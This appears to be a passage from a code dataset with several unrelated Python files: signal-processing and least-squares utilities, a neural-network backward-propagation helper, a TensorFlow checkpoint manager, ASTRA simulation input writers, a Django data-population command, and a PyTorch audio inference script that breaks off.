itertools.cycle([4, 2, 4, 2, 4, 6, 2, 6]))\n for incr in increments:\n if f*f > n:\n break\n while n % f == 0:\n yield f\n n //= f\n f += incr\n if n > 1:\n yield n\n\n\ndef dsample(y, q, zero_phase=True):\n \"\"\"Low-pass filtering and downsampling.\n\n The input can be downsampled(ie. u[::q]) as it does mot contains higher\n harmonics, but y needs to be low-pass filtered in order to avoid aliasing.\n\n If `zero_phase` is ``True``, phase shift will be prevented by shifting the\n output back by the filter's group delay. There will be small edge effects\n in first and last period. If ``False`` the first period is removed due to\n filter-edge effects.\n\n NOTE: There seems to some issues for `zero_phase=False`. Use `True` unless\n you know what you are doing. Probably related to phase shift.\n\n See :func:`scipy.signal.decimate`\n\n Parameters\n ----------\n y: ndarray(Nt,p,P,R)\n n: int, downsample factor\n zero_phase: bool, default True\n\n Returns\n -------\n y: (N,p,R,P) decimated signal\n\n \"\"\"\n Nt, p, R, P = y.shape\n y = np.moveaxis(y, 3, 1).reshape(Nt*P, p, R, order='F')\n\n # prime factor decomposition.\n drate = list(prime_factor(q))\n\n # actually all this is not necessary. Because: N = Nt/q\n # length of decimated signal. Found from matlab help of decimate\n x = Nt*P\n for factor in drate:\n x = np.ceil(x/factor).astype(int)\n\n # decimated time points per period. Shall be integer!\n N = x/P\n assert N % 1 == 0, ('The dfactor does not match number of periods and '\n 'time points!')\n N = int(N)\n\n # zero_phase = True results in small edge effects in first and last\n # period. Instead we can use lfilter, resulting in large edge effects in\n # first period. But even if we discard this period, there will still be\n # a phase shift\n for factor in drate:\n y = decimate(y, q=factor, ftype='fir', axis=0, zero_phase=zero_phase)\n\n y = np.moveaxis(y.reshape(N, P, p, R, order='F'), 1, 3)\n if zero_phase:\n return y\n else:\n # Remove first period to eliminate the edge effects due to the low-pass\n # filter.\n return y[..., 1:]\n\n\ndef db(x, r=1):\n \"\"\"relative value in dB\n\n TODO: Maybe x should be rescaled to ]0..1].?\n log10(0) = inf.\n\n Parameters\n ----------\n x: array like\n r: float, optional\n Reference value. default = 1\n\n Notes\n -----\n https://en.wikipedia.org/wiki/Decibel#Field_quantities_and_root-power_quantities\n \"\"\"\n if not math.isclose(r, 1, rel_tol=1e-6):\n x = x/r\n\n # dont nag if x=0\n with np.errstate(divide='ignore', invalid='ignore'):\n return 20*np.log10(np.abs(x))\n\n\ndef import_npz(npz_file, namespace=globals()):\n \"\"\"Load npz file and unpack data/dictionary to the given namespace\n\n It is necessary to explicit call the function with globals() even if it is\n set as default value here. The docs states that the scope is the defining\n module not the calling.\n\n Example for `oneliner` without using namespace(can only be used local)\n for varName in data.files:\n exec(varName + \" = data['\" + varName + \"']\")\n\n Notes:\n ------\n https://docs.python.org/3/library/functions.html#globals\n \"\"\"\n data = np.load(npz_file)\n for varName in data:\n try:\n namespace[varName] = data[varName].item()\n except ValueError:\n namespace[varName] = data[varName]\n\n\ndef window(iterable, n=3):\n \"\"\"Returns a sliding window (of width n) over data from the iterable\n s -> (s0,s1,...s[n-1]), (s1,s2,...,sn), ...\"\"\"\n # https://stackoverflow.com/a/6822773/1121523\n it = iter(iterable)\n result = tuple(itertools.islice(it, n))\n if len(result) == n:\n yield result\n for element in it:\n result = result[1:] + (element,)\n yield result\n\n\ndef rescale(x, mini=None, maxi=None):\n \"\"\"Rescale x to 0-1.\n\n If mini and maxi is given, then they are used as the values that get scaled\n to 0 and 1, respectively\n\n Notes\n -----\n To 0..1:\n z_i = (x_i− min(x)) / (max(x)−min(x))\n\n Or custom range:\n a = (maxval-minval) / (max(x)-min(x))\n b = maxval - a * max(x)\n z = a * x + b\n\n \"\"\"\n if hasattr(x, \"__len__\") is False:\n return x\n\n if mini is None:\n mini = np.min(x)\n if maxi is None:\n maxi = np.max(x)\n return (x - mini) / (maxi - mini)\n\n\ndef meanVar(Y, isnoise=False):\n \"\"\"\n Y = fft(y)/nsper\n\n Parameters\n ----------\n Y : ndarray (ndof, nsper, nper)\n Y is the fft of y\n \"\"\"\n\n # number of periods\n p = Y.shape[2]\n\n # average over periods\n Ymean = np.sum(Y, axis=2) / p\n\n # subtract column mean from y in a broadcast way. Ie: y is 3D matrix and\n # for every 2D slice we subtract y_mean. Python automatically\n # broadcast(repeat) y_mean.\n # https://scipy.github.io/old-wiki/pages/EricsBroadcastingDoc\n Y0 = Y - Ymean[..., None]\n\n W = []\n # weights. Only used if the signal is noisy and multiple periods are\n # used\n if p > 1 and isnoise:\n W = np.sum(np.abs(Y0)**2, axis=2)/(p-1)\n\n return Ymean, W\n\n\ndef weightfcn(cov):\n \"\"\"Calculate weight. For subspace is the square inverse of covG. For\n pnlss it is the square inverse of covY\"\"\"\n F = cov.shape[0]\n covinvsq = np.empty_like(cov)\n for f in range(F):\n covinvsq[f] = matrix_square_inv(cov[f])\n return covinvsq\n\n\ndef matrix_square_inv(A):\n \"\"\"Calculate the inverse of the matrix square root of `A`\n Calculate `X` such that XX = inv(A)\n `A` is assumed positive definite, thus the all singular values are strictly\n positive. Given the svd decomposition A=UsVᴴ, we see that\n AAᴴ = Us²Uᴴ (remember (UsV)ᴴ = VᴴsUᴴ) and it follows that\n (AAᴴ)⁻¹/² = Us⁻¹Uᴴ\n Returns\n -------\n X : ndarray(n,n)\n Inverse of matrix square root of A\n Notes\n -----\n See the comments here.\n https://math.stackexchange.com/questions/106774/matrix-square-root\n \"\"\"\n U, s, _ = svd(A, full_matrices=False)\n return U * 1/np.sqrt(s) @ U.conj().T\n\n\ndef mmul_weight(mat, weight):\n \"\"\"Add weight. Computes the Jacobian of the weighted error ``e_W(f) = W(f,:,:)*e(f)``\n\n \"\"\"\n # np.einsum('ijk,kl',weight, mat) or\n # np.einsum('ijk,kl->ijl',weight, mat) or\n # np.einsum('ijk,jl->ilk',weight,mat)\n # np.tensordot(weight, mat, axes=1)\n # np.matmul(weight, mat)\n return np.matmul(weight, mat)\n\n\ndef normalize_columns(mat):\n\n # Rms values of each column\n scaling = np.sqrt(np.mean(mat**2, axis=0))\n # or scaling = 1/np.sqrt(mat.shape[0]) * np.linalg.norm(mat,ord=2,axis=0)\n # Robustify against columns with zero rms value\n scaling[scaling == 0] = 1\n # Scale columns with 1/rms value\n # This modifies mat in place(ie the input mat). We do not want that.\n # mat /= scaling\n return mat/scaling, scaling\n\n\ndef lm(fun, x0, jac, info=2, nmax=50, lamb=None, ftol=1e-8, xtol=1e-8,\n gtol=1e-8, cost_normalize=None, args=(), kwargs={}):\n \"\"\"Solve a nonlinear least-squares problem using levenberg marquardt\n algorithm. See also :scipy-optimize:func:`scipy.optimize.least_squares`\n\n Parameters\n ----------\n fun : callable\n Function which computes the vector of residuals\n x0: array_like with shape (n,) or float\n Initial guess on independent variables.\n jac : callable\n Method of computing the Jacobian matrix (an m-by-n matrix, where\n element (i, j) is the partial derivative of f[i] with respect to\n x[j]).\n ftol : float, optional\n Tolerance for termination by the change of the cost function. Default\n is 1e-8. The optimization process is stopped when ``dF < ftol * F``,\n and there was an adequate agreement between a local quadratic model and\n the true model in the last step.\n xtol : float, optional\n Tolerance for termination by the change of the independent variables.\n Default is 1e-8.\n gtol : float, optional\n Tolerance for termination by the norm of the gradient. Default is 1e-8.\n info : {0, 1, 2}, optional\n Level of algorithm's verbosity:\n * 0 (default) : work silently.\n * 1 : display a termination report.\n * 2 : display progress during iterations\n\n \"\"\"\n # the error vector\n err_old = fun(x0, *args, **kwargs)\n # Maybe divide by 2 to match scipy's implementation of minpack\n cost = np.dot(err_old, err_old)\n cost_old = cost.copy()\n\n # Initialization of the Levenberg-Marquardt loop\n niter = 0\n ninner_max = 10\n nfev = 1\n status = None\n message = ''\n cost_vec = np.empty(nmax+1)\n x0_mat = np.empty((nmax+1, len(x0)))\n # save initial guess\n x0_mat[0] = x0.copy()\n cost_vec[0] = cost.copy()\n\n # Allow for different kinds of cost_normalization\n if cost_normalize is None:\n def _cost_normalize(x): return x\n elif np.isscalar(cost_normalize):\n def _cost_normalize(x): return x/cost_normalize\n else: # if callable(obj)\n _cost_normalize = cost_normalize\n\n if info == 2:\n print(f\"{'i':3} | {'inner':5} | {'cost':12} | {'cond':12} |\"\n f\" {'lambda':6}\")\n\n stop = False\n while niter < nmax and not stop:\n\n J = jac(x0, *args, **kwargs)\n J, scaling = normalize_columns(J)\n U, s, Vt = svd(J, full_matrices=False)\n\n if norm(J) < gtol: # small jacobian\n stop = True\n status = 1\n\n if lamb is None:\n # Initialize lambda as largest sing. value of initial jacobian.\n # pinleton2002\n lamb = s[0]\n\n # as long as the step is unsuccessful\n ninner = 0\n # determine rank of jacobian/estimate non-zero singular values(rank\n # estimate)\n tol = max(J.shape)*np.spacing(max(s))\n r = np.sum(s > tol)\n\n # step with direction from err\n s = s[:r]\n sr = s.copy() # only saved to calculate cond. number later\n while cost >= cost_old and ninner < ninner_max and not stop:\n s /= (s**2 + lamb**2)\n ds = -np.linalg.multi_dot((err_old, U[:, :r] * s, Vt[:r]))\n ds /= scaling\n\n x0test = x0 + ds\n err = fun(x0test, *args, **kwargs)\n cost = np.dot(err, err)\n if cost >= cost_old:\n # step unsuccessful, increase lambda, ie. Lean more towards\n # gradient descent method(converges in larger range)\n lamb *= np.sqrt(10)\n s = sr.copy()\n elif np.isnan(cost):\n print('Unstable model. Increasing lambda')\n cost = np.inf\n lamb *= np.sqrt(10)\n s = sr.copy()\n else:\n # Lean more towards Gauss-Newton algorithm(converges faster)\n lamb /= 2\n ninner += 1\n\n if norm(ds) < xtol: # small step\n stop = True\n status = 3\n if np.abs((cost-cost_old)/cost) < ftol: # small change in costfcn\n stop = True\n status = 2 if status is None else 4\n\n if info == 2:\n jac_cond = sr[0]/sr[-1]\n # {cost/2/nfd/R/p:12.3f} for freq weighting\n print(f\"{niter:3d} | {ninner:5d} | {_cost_normalize(cost):12.8g}\"\n f\" | {jac_cond:12.3f} | {lamb:6.3f}\")\n\n if cost < cost_old or stop:\n cost_old = cost\n err_old = err\n x0 = x0test\n # save intermediate models\n x0_mat[niter+1] = x0.copy()\n cost_vec[niter+1] = cost.copy()\n\n niter += 1\n nfev += ninner\n\n if niter == nmax:\n status = 0\n message = TERMINATION_MESSAGES[status]\n if info > 0:\n print(f\"Terminated: {message:s}\")\n print(f\"Function evaluations {nfev}, \"\n f\"initial cost {_cost_normalize(cost_vec[0]):.4e}, \"\n f\"final cost {_cost_normalize(cost):.4e}\")\n\n res = {'x': x0, 'cost': cost, 'fun': err, 'niter': niter, 'x_mat':\n x0_mat[:niter], 'cost_vec': cost_vec[niter], 'message': message,\n 'success': status > 0, 'nfev': nfev, 'njev': niter, 'status': status}\n return res\n","sub_path":"pyvib/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":14291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350007311","text":"from AC_DeepNet.linear_backward import linear_backward\nfrom AC_DeepNet.relu_backward import relu_backward\nfrom AC_DeepNet.sigmoid_backward import sigmoid_backward\n\n\ndef linear_activation_backward(dA, cache, activation):\n \"\"\"\n Implement the backward propagation for the LINEAR->ACTIVATION layer\n :param dA: post-activation gradient for current layer l\n :param cache: tuple of values (linear_cache, activation_cache) we stored\n :param activation: the activation to be used in this layer: \"sigmoid\" or \"relu\"\n :return: gradient of the cost wrt the activation (of the previous layer l-1), same shape as A_prev -- dA_prev\n gradient of the cost wrt W (current layer l), same shape as W -- dW\n gradient of the cost wrt b (current layer l), same shape as b -- db\n \"\"\"\n\n linear_cache, activation_cache = cache\n\n if activation == \"relu\":\n dZ = relu_backward(dA, activation_cache)\n dA_prev, dW, db = linear_backward(dZ, linear_cache)\n\n elif activation == \"sigmoid\":\n dZ = sigmoid_backward(dA, activation_cache)\n dA_prev, dW, db = linear_backward(dZ, linear_cache)\n\n return dA_prev, dW, db","sub_path":"AC_DeepNet/linear_activation_backward.py","file_name":"linear_activation_backward.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"481886128","text":"\"\"\"Manage saving and loading of model checkpoints.\"\"\"\nimport os\nimport re\n\nimport tensorflow as tf\n\n\nclass CheckpointManager(object):\n \"\"\"Manager to coordinate saving and loading of trainable parameters.\"\"\"\n\n def __init__(self, model):\n \"\"\"Initialize manager based on given model instance.\"\"\"\n self._tensorflow_session = model._tensorflow_session\n self._model = model\n\n def build_savers(self):\n \"\"\"Create tf.train.Saver instances.\"\"\"\n all_saveable_vars = sorted(tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES) +\n tf.get_collection(tf.GraphKeys.SAVEABLE_OBJECTS) +\n tf.get_collection(tf.GraphKeys.MOVING_AVERAGE_VARIABLES) +\n tf.get_collection_ref('batch_norm_non_trainable'),\n key=lambda v: v.name)\n all_prefixes = []\n for schedule in self._model._learning_schedule:\n for prefixes in schedule['loss_terms_to_optimize'].values():\n all_prefixes += prefixes\n all_prefixes = list(set(all_prefixes))\n\n # For each prefix, create saver\n self._savers = {}\n for prefix in all_prefixes:\n vars_to_save = [v for v in all_saveable_vars if v.name.startswith(prefix + '/')]\n if len(vars_to_save):\n self._savers[prefix] = tf.train.Saver(vars_to_save, max_to_keep=2)\n\n def load_all(self):\n \"\"\"Load all available weights for each known prefix.\"\"\"\n iteration_number = 0\n for prefix, saver in self._savers.items():\n output_path = '%s/checkpoints/%s' % (self._model.output_path, prefix)\n checkpoint = tf.train.get_checkpoint_state(output_path)\n if checkpoint and checkpoint.model_checkpoint_path:\n checkpoint_name = os.path.basename(checkpoint.model_checkpoint_path)\n try: # Attempt to restore saveable variables\n self._savers[prefix].restore(self._tensorflow_session,\n '%s/%s' % (output_path, checkpoint_name))\n iteration_number = \\\n int(next(re.finditer(\"(\\d+)(?!.*\\d)\", checkpoint_name)).group(0))\n except Exception as e:\n import traceback\n traceback.print_exc()\n return iteration_number\n\n def save_all(self, iteration_number):\n \"\"\"Save all prefixes.\"\"\"\n for prefix, saver in self._savers.items():\n output_path = '%s/checkpoints/%s' % (self._model.output_path, prefix)\n if not os.path.isdir(output_path):\n os.makedirs(output_path)\n saver.save(self._tensorflow_session, output_path + '/model',\n global_step=iteration_number)\n","sub_path":"src/core/checkpoint_manager.py","file_name":"checkpoint_manager.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284291395","text":"def generator_file(astra_path, IPart='1000', Ref_Ekin='0.00', sig_Ekin='100.0', laser_pulse='190.0e-6', spot_size='100'):\n generator_input_file=open(astra_path + 'common_files/distrib_sspot'+spot_size+'.in','w')\n generator_input_file.write(\n\"\"\"&INPUT\nFNAME='distrib_sspot\"\"\"+spot_size+\"\"\".ini'\nAdd=FALSE,\tN_add=0\nIPart=\"\"\" + IPart + \n\"\"\"\nSpecies='electrons'\nProbe=True,\tNoise_reduc=F,\tCathode=T\nQ_total=\"\"\" + str(1.60217662*1e-10*int(IPart)) + \n\"\"\"\nRef_zpos=0.0\nRef_Ekin=\"\"\" + Ref_Ekin + \"\"\"\t\nsig_Ekin=\"\"\" + sig_Ekin + \"\"\"\nC_sig_Ekin=0.0\nDist_z='g'\nsig_clock=\"\"\" + laser_pulse + \"\"\"\nC_sig_clock=0.0\nDist_pz='isotropic',\tphi_eff=4.65,\tE_photon=4.7 \n\nDist_x='g'\nsig_x=\"\"\" + str(int(spot_size)*0.001) + \"\"\"\nc_sig_x=0.0,\tDist_px = 'g', sig_px = 0.0, Nemit_x=0.0\nDist_y='g'\nsig_y=\"\"\" + str(int(spot_size)*0.001) + \"\"\"\nc_sig_y=0.0,\tDist_py = 'g', sig_py = 0.0, Nemit_y=0.0 \n/\n\"\"\")\n generator_input_file.close()\n\ndef astra_file(tracking_path, B_field_filename, E_field_filename, max_Ez, IPart='1000', Ap_R='0.1', Ap_z1='0.0105', Ap_z2='0.0108', spot_size='100'):\n astra_input_file=open(tracking_path + B_field_filename + '/' + B_field_filename + '_sspot'+spot_size+'.in','w')\n #making astra input files\n astra_input_file.write(\n\"\"\"&NEWRUN\nHead='astra template'\nRUN=1\nLoop=F, Nloop=2\nDistribution = 'distrib_sspot\"\"\" +spot_size+\"\"\".ini'\nXoff=0.0, Yoff=0.0\nLmagnetized=T\nEmitS=T\nPhaseS=T\nTrackS=T\nLandFS=T\nRefS=T\nTcheckS=T\nCathodeS=T\nTRACK_ALL=T\nPHASE_SCAN=F\nAUTO_PHASE=T\ncheck_ref_part=F,\nZSTART=0.0, ZSTOP=0.03\nZemit=500\nZphase=10\nH_max=8.0E-5\nH_min=0.0\n/\n\n&SCAN\nLScan=F\nScan_para='Zrms',S_min=0.0 ,S_max=5.0E-4 ,S_numb=9\nFOM(1)='bunch length'\n/\n\n&CHARGE\nLoop=F\nLSPCH=T\nNrad=10, Nlong_in=10\nCell_var=2.0\nmin_grid=1.0E-7\nMax_scale=0.05\nMax_count=10\nLmirror=T\n/\n\n&Aperture\nLApert=F\nFile_Aperture(1)='RAD'\nAp_R(1)=\"\"\"+Ap_R+\"\"\"\nAp_Z1(1)=\"\"\"+Ap_z1+\"\"\"\nAp_Z2(1)=\"\"\"+Ap_z2+\"\"\"\n/\n\n&CAVITY\nLoop=F\nLEFieLD=T\nC_noscale(1)=F\nFILE_EFieLD(1)='\"\"\" + E_field_filename + \"\"\".dat'\nC_smooth(1)=0.0\nNue(1)=0.0\nMaxE(1)=\"\"\"+str(max_Ez)+\n\"\"\"\nPhi(1)=0.0,\nC_pos(1)=0.0\n/\n\n&SOLENOID\nLoop=F\nLBFieLD=T\nFILE_BFieLD(1)='\"\"\" + B_field_filename + \"\"\".dat'\nS_smooth(1)=0.0\nS_noscale(1)=T\nS_higher_order=F\nS_pos(1)=0.0\nS_xoff(1)=0.0\nS_yoff(1)=0.0\n/\n\"\"\")\n astra_input_file.close()\n\n","sub_path":"source_code/astra_inputs.py","file_name":"astra_inputs.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"211548053","text":"from django.core.management.base import BaseCommand\nfrom Users.models import User, ActivityPeriod\nfrom numpy.random import randint\nimport pandas as pd\nfrom baseconvert import base\nfrom datetime import timedelta\nfrom randomtimestamp import randomtimestamp\nfrom functools import reduce\nfrom pytz import timezone as get_timezone\nfrom tqdm import tqdm, trange\nimport string\n\n## just a function, which is not directly related to our case\ndef get_conversion_dict():\n '''\n creates a dictionary mapping numbers to letters and digits\n all the digits and alphabets will be mapped to a numbers between 0 and 61\n it will be for converting integer ids to a string id\n will return a dictionary that looks like the following:\n {0 : '0', 1 : '1', ..., 9:'9', 10: 'a', 11: 'b', ..., 60: 'Y', 61: 'Z'}\n '''\n digits = string.digits\n conversion_dict = { i:digits[i] for i in range(len(digits))}\n letters = string.ascii_letters\n conversion_dict = { **conversion_dict, **dict(zip(range(len(digits), len(digits) + len(letters)), letters))}\n return conversion_dict\n\nconversion_dict = get_conversion_dict()\n\n\ndef integer_id_to_string_id(integer_id):\n '''\n converts an integer to a base 62 number and maps the individual digits to a alphanumeric character with the\n help of the conversion dict created above\n\n this function and the get_conversion dict function are just for making string ids out of integer ids and might not\n be crucial to our case unless string ids are compulsory\n '''\n return \"\".join([conversion_dict[digit] for digit in base(integer_id, 10, 62)])\n\n\nclass Command(BaseCommand):\n '''\n Class for creating a command which can be used from the terminal to populate database with generated data\n '''\n help = 'Populate database with sample data'\n\n def add_arguments(self, parser):\n '''\n adds arguments to the command to determine variables for populating data\n '''\n\n # number of user records to be inserted into the database\n parser.add_argument('--no-user-records', type=int)\n\n # number of activity period entries to be inserted into the database per user, within the range entered\n parser.add_argument('--no-periods-per-user', nargs=2, type=int)\n\n # argument for localizing datetimes according to user timezones (making them timzezone 'aware' instead of 'naive')\n parser.add_argument('--localize-datetime', default=False)\n\n def handle(self, *args, **options):\n '''\n this method populates the database with randomly generated values with the help of other functions in this module\n '''\n\n ## receiving command line arguments\n no_of_users_records = options[\"no_user_records\"]\n min_periods_per_user, max_periods_per_user = options['no_periods_per_user']\n use_user_timezone = options['localize_datetime'].lower() == 'true'\n assert min_periods_per_user<=max_periods_per_user\n\n ## reading sample data for names and timezones in order to generate new samples from them\n with open('Users/datapopulation/first_names_all.txt', 'r') as file:\n first_names = file.read().split(\"\\n\")\n with open('Users/datapopulation/last_names_all.txt', 'r') as file:\n last_names = file.read().split(\"\\n\")\n timezones = list(pd.read_csv(\"Users/datapopulation/zone.csv\", header=None)[2])\n\n ## calling the other functions defined and populating the database\n self.populate_database(no_of_users_records, min_periods_per_user, max_periods_per_user, first_names, last_names, timezones, use_user_timezone=use_user_timezone)\n\n\n\n # generate a single User instance with randomly selected values\n def generate_single_user_instance(self, serial_no, first_names, last_names, timezones, no_of_first_names, no_of_last_names, no_of_timezones):\n '''\n description : generates a User object by combining first and last names to a realname field, choosing a random timezone\n and using the id passed.\n\n\n params\n ------\n serial_no : int\n the id of the user generated as a serial (increment by one) which is to be converted to a string_id using\n the integer_id_to_string_id method\n first_names : list\n a list containing common first names of people\n last_names : list\n a list containing common last names of people\n timezones : list\n a list containing names of different timezones around the world\n no_of_first_names : int\n number of first names in the first_names list, equals len(first_names)\n no_of_first_names : int\n number of last names in the last_names list, equals len(last_names)\n no_of_first_names : int\n number of timezones in the timezones list, equals len(timezones)\n\n returns\n -------\n A models.User object\n '''\n realname = \" \".join([first_names[randint(0, no_of_first_names)], last_names[randint(0,no_of_last_names)]])\n realname = realname.title()\n timezone = timezones[randint(0,no_of_timezones)]\n return User(id=integer_id_to_string_id(serial_no), realname = realname, tz = timezone )\n\n # create User instances for populating database\n def create_user_instances(self, no_of_instances, first_names, last_names, timezones, id_offset=int(1e20)):\n '''\n description : generates the number of User instances specified in the no_of_instances_variable\n\n params\n ------\n no_of_instances : int\n the number of objects to be created and returned\n first_names : list\n a list containing common first names of people\n last_names : list\n a list containing common last names of people\n timezones : list\n a list containing names of different timezones around the world\n id_offset : int\n a large number, the minimum integer id is this number and is incremented by 1 for each new object to be generated\n has no real purpose other than to making the length of the string id large\n\n returns\n -------\n A list of models.User objects\n '''\n no_of_first_names = len(first_names)\n no_of_last_names = len(last_names)\n no_of_timezones = len(timezones)\n print(f\"Creating dummy data for {no_of_instances} users...\")\n instances = [ self.generate_single_user_instance(serial_no, first_names, last_names, timezones, no_of_first_names, no_of_last_names, no_of_timezones) for serial_no in trange(id_offset, id_offset+no_of_instances)]\n return instances\n\n # method for creating a single ActivityPeriod instance\n def create_activity_period_single_instance(self, user, min_minutes_per_session, max_minutes_per_session, starting_year, user_timezone = None):\n '''\n description : creates a single instance of models.ActivityPeriod for the particular user\n\n params\n -------\n user : models.User\n the user id for which the ActivityPeriod has to be created is retrieved from this User object\n min_minutes_per_session : int\n the minimum number of minutes that an ActivityPeriod will have i.e. endtime - starttime >= min_minutes_per_session\n max_minutes_per_session : int\n the maximum number of minutes that an ActivityPeriod will have i.e. endtime - starttime <= max_minutes_per_session\n starting_year : int\n year after which datetimes will be generated e.g. if starting year is 2010, all dates generated will\n be after 2010\n user_timezone : str\n the timezone of the user. if None the datetimes generated will be naive\n\n returns\n -------\n An instance of models.ActivityPeriod\n\n '''\n\n # generate a random timestamp after starting year which will be our starttime and add a value within the range\n # (min_minutes_per_session, max_minutes_per_session) to obtain a random endtime\n start_datetime = randomtimestamp(starting_year, False)\n end_datetime = start_datetime + timedelta(minutes=randint(min_minutes_per_session, max_minutes_per_session))\n\n # if user_timezone is passed convert the datetime to a timezone localized datetime\n if user_timezone:\n user_timezone = get_timezone(user_timezone)\n start_datetime = user_timezone.localize(start_datetime)\n end_datetime = user_timezone.localize(end_datetime)\n\n return ActivityPeriod(userid=user, starttime=start_datetime, endtime=end_datetime)\n\n # method for creating multiple ActivityPeriod instances for a single user\n def create_activity_period_instances_for_single_user(self, user,\n no_of_periods, min_minutes_per_session = 0.2, max_minutes_per_session=1000,\n starting_year= 2010, user_timezone = None):\n '''\n description : for a single users, generates multiple activity periods specified by the no_of_periods\n\n params\n ------\n user : models.User\n the user id for which the ActivityPeriod has to be created is retrieved from this User object\n no_of_periods : int\n the number of instances to be generated for the given user\n min_minutes_per_session : int\n the minimum number of minutes that an ActivityPeriod will have i.e. endtime - starttime >= min_minutes_per_session\n max_minutes_per_session : int\n the maximum number of minutes that an ActivityPeriod will have i.e. endtime - starttime <= max_minutes_per_session\n starting_year : int\n year after which datetimes will be generated e.g. if starting year is 2010, all dates generated will\n be after 2010\n user_timezone : str\n the timezone of the user. if None the datetimes generated will be naive\n\n returns\n -------\n A list of models.ActivityPeriod objects with the same userid\n '''\n return [ self.create_activity_period_single_instance(user, min_minutes_per_session, max_minutes_per_session, starting_year, user_timezone) for i in range(no_of_periods)]\n\n # method for generating activity periods of users from a list of user ids\n def create_activity_periods_for_all_users(self, users, min_periods = 1, max_periods = 16, use_user_timezone = True):\n '''\n description : creates several activity periods individually for all the users given\n\n params\n ------\n users : list\n a list of models.User instances, whose ids are to be used to creating ActivityPeriod instances\n min_periods : int\n the minimum number of activity periods to be generated per user\n max_periods : int\n the minimum number of activity periods to be generated per user\n use_user_timezone : boolean\n if true, gets the timezone from the User objects and localizes the datetimes (starttime and endtime) in the\n ActivityPeriod instances to be generated\n\n returns\n -------\n a list of models.ActivityPeriod instances\n '''\n print(f\"Creating dummy data for activity periods for {len(users)} users...\")\n\n # get an individual list of ActivityPeriod instances for each user and store them in a single list\n if use_user_timezone:\n results = [ self.create_activity_period_instances_for_single_user(user, randint(min_periods, max_periods), user_timezone=user.tz) for user in tqdm(users)]\n else:\n results = [ self.create_activity_period_instances_for_single_user(user, randint(min_periods, max_periods), user_timezone=None) for user in tqdm(users)]\n print(\"Reducing results to single list...\")\n # reduce the nested list structure into a single list of ActivityPeriod instances\n results = reduce(lambda x,y : [*x,*y], tqdm(results))\n return results\n\n # method for populating both the users and activity period database using the methods described above\n def populate_database(self, no_of_users_records, min_periods_per_user, max_periods_per_user, first_names, last_names, timezones, use_user_timezone=False):\n '''\n description : generates a list of users and a list of activity periods for the users, and stores them in the database\n\n params\n ------\n no_of_user_records : int\n the number of User instances to be generated\n min_periods_per_user : int\n the minimum number of activity periods to be generated per user\n max_periods_per_user : int\n the minimum number of activity periods to be generated per user\n first_names : list\n a list containing common first names of people\n last_names : list\n a list containing common last names of people\n timezones : list\n a list containing names of different timezones around the world\n use_user_timezone : boolean\n whether to localize datetime entities with the user's timezone\n '''\n users_data = self.create_user_instances(no_of_users_records, first_names, last_names, timezones)\n acitivity_periods_data = self.create_activity_periods_for_all_users([ user for user in users_data], use_user_timezone=use_user_timezone)\n print(\"Dummy data created.\")\n\n print(\"Populating users data...\")\n User.objects.bulk_create(users_data)\n print(\"Users data populated successfully.\")\n\n print(\"Populating activity periods data...\")\n ActivityPeriod.objects.bulk_create(acitivity_periods_data)\n print(\"Activity periods data populated successfully.\")\n","sub_path":"Users/management/commands/populate_user_data.py","file_name":"populate_user_data.py","file_ext":"py","file_size_in_byte":14319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"616750534","text":"#!/usr/bin/env python3\n\nimport torch.utils.data as data\nimport os\nimport soundfile\nimport numpy as np\nimport torch.nn as nn\nimport torch\nimport torch.optim as optim\nimport copy\nimport torch.nn.functional as Func\nimport time\nfrom scipy.signal import stft, istft\n\n# Carbonate directory\nWAV_DIR = '/N/u/bsobolik/Carbonate/finalproject/TIMIT_full_fft2/test/'\nWAV_DIR = '/N/u/bsobolik/Carbonate/finalproject/test_file/'\n\n\n# WAV_DIR = '/Users/bsobolik/Desktop/TIMIT_full_copy/'\n\n# gcp directory\n# WAV_DIR = '/home/bsobolik_gmail_com/TIMIT_full_copy/test/'\n\nnps = 64\noverlap = .5\nnfft = 128\nsr = 16000\nfile_length_in_seconds = 3\nduration = sr * file_length_in_seconds\nflat_file_suffix = '_flat_fft'\nstep = int(nps * overlap)\n\nclass Net(nn.Module):\n def __init__(self, in_size, out_size):\n super(Net, self).__init__()\n\n self.fc1 = nn.Linear(in_size, 1024)\n self.fc2 = nn.Linear(1024, 1024)\n self.fc3 = nn.Linear(1024, 1024)\n self.fc4 = nn.Linear(1024, out_size)\n\n def forward(self, audio):\n audio = Func.relu(self.fc1(audio))\n audio = Func.relu(self.fc2(audio))\n audio = Func.relu(self.fc3(audio))\n audio = self.fc4(audio)\n return audio\n\ndef pad_or_truncate_data(mydata, length):\n data_length = len(mydata)\n if data_length > length:\n return mydata[:length]\n return np.concatenate((mydata, np.zeros(length - data_length)))\n\ndef get_files(path_to_files, suffix):\n result = []\n for dirname, dirnames, filenames in os.walk(path_to_files):\n for filename in filenames:\n if filename.endswith(suffix):\n result.append(os.path.join(dirname, filename))\n return result\n\ndef reshape_fft(nps, mydata):\n x = nps + 1\n y = int(len(mydata) / (x * 2))\n output = np.array([np.complex(x, y) for x, y in mydata.reshape([int(len(mydata)/2), 2])])\n return output.reshape((x, y), order='F')\n\ntest_files = get_files(WAV_DIR, '.wav')\nm1 = Net(nps, nfft + 2)\nm1.load_state_dict(torch.load('./models/dnn_model_carbonate_v2.pth'))\nprint(m1)\nm1 = m1.double()\n\nfor j, filepath in enumerate(test_files):\n print('{} of {}: {}'.format(j, len(test_files), filepath))\n\n fft_result = np.array([],dtype = np.float64)\n X, _ = soundfile.read(filepath)\n X = pad_or_truncate_data(X, sr * file_length_in_seconds)\n for i in range(0, duration, step):\n wav_start = i\n wav_end = i + nps\n if wav_end <= duration:\n m1.eval()\n input = torch.from_numpy(X[wav_start:wav_end])\n output = m1(input)\n temp = output.cpu().data.numpy()\n fft_result = np.concatenate((fft_result, temp))\n print(fft_result[:10])\n print('writing fft: length={}'.format(len(fft_result)))\n 